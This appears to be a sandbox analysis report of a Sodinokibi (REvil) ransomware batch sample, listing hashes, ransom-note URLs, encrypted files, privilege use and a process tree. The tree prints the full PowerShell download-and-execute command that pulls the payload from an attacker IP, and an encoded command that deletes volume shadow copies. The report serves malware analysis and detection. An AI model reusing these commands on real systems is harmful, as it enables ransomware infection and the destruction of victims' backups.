Analysis
- max time kernel: 85s
- max time network: 99s
- platform: windows7_x64
- resource: win7
- submitted: 15-08-2020 22:10
Static task: static1
Behavioral task: behavioral1
- Sample: 671ad8514649a9e90db4be04050939fc.bat
- Resource: win7
Behavioral task: behavioral2
- Sample: 671ad8514649a9e90db4be04050939fc.bat
- Resource: win10
General
- Target: 671ad8514649a9e90db4be04050939fc.bat
- Size: 222B
- MD5: ae3b86ee141489a333cd5b79879ce5fb
- SHA1: 59fcd2d5b1dc48ea3a135a908d2342f41801c748
- SHA256: 9f5a1dc3b6de60187465045347cd822a1442279e6d75aa5b8e08bfe8811619c4
- SHA512: 08e7101feb1b8fcc3e48a3b6586279038d039490a198bbfa3c71acfb6c020b917a5941517376d1f7518f8e28b810f871c0401ad2aa0dc5ff86c522a18973d6c7
Malware Config
Extracted (URL fetched by the first powershell.exe stage):
- http://185.103.242.78/pastes/671ad8514649a9e90db4be04050939fc
Extracted from C:\t59qq1s-readme.txt:
- Family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FA804DD0DEFEFFDE
- http://decryptor.cc/FA804DD0DEFEFFDE
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (1 IoC)
  Processes:
    flow 4, PID 932, powershell.exe
- Modifies extensions of user files (9 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes (all by powershell.exe):
    File opened for modification: \??\c:\users\admin\pictures\UnprotectRedo.tiff
    File renamed: C:\Users\Admin\Pictures\ConnectCheckpoint.crw => \??\c:\users\admin\pictures\ConnectCheckpoint.crw.t59qq1s
    File renamed: C:\Users\Admin\Pictures\LockRemove.raw => \??\c:\users\admin\pictures\LockRemove.raw.t59qq1s
    File renamed: C:\Users\Admin\Pictures\SubmitCompare.crw => \??\c:\users\admin\pictures\SubmitCompare.crw.t59qq1s
    File renamed: C:\Users\Admin\Pictures\UnprotectRedo.tiff => \??\c:\users\admin\pictures\UnprotectRedo.tiff.t59qq1s
    File renamed: C:\Users\Admin\Pictures\WriteRegister.png => \??\c:\users\admin\pictures\WriteRegister.png.t59qq1s
    File renamed: C:\Users\Admin\Pictures\DismountCheckpoint.crw => \??\c:\users\admin\pictures\DismountCheckpoint.crw.t59qq1s
    File renamed: C:\Users\Admin\Pictures\LimitUnprotect.tif => \??\c:\users\admin\pictures\LimitUnprotect.tif.t59qq1s
    File renamed: C:\Users\Admin\Pictures\ReceiveResize.crw => \??\c:\users\admin\pictures\ReceiveResize.crw.t59qq1s
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes (all by vssvc.exe):
    Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
    Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
    Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
    Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes (powershell.exe):
    Set value (str): \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2l37v7e2.bmp"
- Drops file in Program Files directory (27 IoCs)
  Processes (all by powershell.exe):
    File created: \??\c:\program files\t59qq1s-readme.txt
    File opened for modification: \??\c:\program files\RenameResolve.odt
    File created: \??\c:\program files (x86)\t59qq1s-readme.txt
    File opened for modification: \??\c:\program files\JoinSync.ex_
    File opened for modification: \??\c:\program files\ResetMount.tmp
    File opened for modification: \??\c:\program files\TraceRestart.mpeg3
    File opened for modification: \??\c:\program files\StepMerge.xml
    File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\t59qq1s-readme.txt
    File opened for modification: \??\c:\program files\CompareExpand.pdf
    File opened for modification: \??\c:\program files\CompressCompare.odp
    File opened for modification: \??\c:\program files\InstallFind.wvx
    File opened for modification: \??\c:\program files\JoinSplit.vb
    File opened for modification: \??\c:\program files\RenameWrite.rtf
    File opened for modification: \??\c:\program files\AddConvertTo.cfg
    File opened for modification: \??\c:\program files\SetInvoke.ini
    File opened for modification: \??\c:\program files\UseOpen.jpeg
    File opened for modification: \??\c:\program files\ExpandFormat.css
    File created: \??\c:\program files\microsoft sql server compact edition\t59qq1s-readme.txt
    File opened for modification: \??\c:\program files\PublishPop.mp4
    File opened for modification: \??\c:\program files\UnregisterSync.easmx
    File opened for modification: \??\c:\program files\CompleteRedo.snd
    File opened for modification: \??\c:\program files\ImportRename.midi
    File opened for modification: \??\c:\program files\UnregisterPush.pps
    File created: \??\c:\program files\microsoft sql server compact edition\v3.5\t59qq1s-readme.txt
    File opened for modification: \??\c:\program files\EnterPush.png
    File opened for modification: \??\c:\program files\LimitSync.xhtml
    File opened for modification: \??\c:\program files\OpenOut.htm
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes:
    PID 932, powershell.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
    PID 932, powershell.exe (reported 3 times)
    PID 1848, powershell.exe (reported 2 times)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes:
    Token: SeDebugPrivilege, PID 932, powershell.exe (reported 2 times)
    Token: SeDebugPrivilege, PID 1848, powershell.exe
    Token: SeBackupPrivilege, PID 1640, vssvc.exe
    Token: SeRestorePrivilege, PID 1640, vssvc.exe
    Token: SeAuditPrivilege, PID 1640, vssvc.exe
    Token: SeTakeOwnershipPrivilege, PID 932, powershell.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes:
    PID 1448 (cmd.exe) wrote to memory of PID 932 (powershell.exe) (reported 4 times)
    PID 932 (powershell.exe) wrote to memory of PID 1848 (powershell.exe) (reported 4 times)
Processes
- C:\Windows\system32\cmd.exe (PID 1448)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\671ad8514649a9e90db4be04050939fc.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 932, child of 1448)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/671ad8514649a9e90db4be04050939fc');Invoke-BLPXTQOPGQRVCUQ;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1848, child of 932)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64 of a UTF-16LE string; decoded, it enumerates Win32_ShadowCopy objects through WMI and calls Delete() on each one, i.e. it removes the volume shadow copies. That is what triggers the vssvc.exe activity recorded below, and it is the behaviour a shadow-copy-deletion detection rule should key on.)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 1640)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken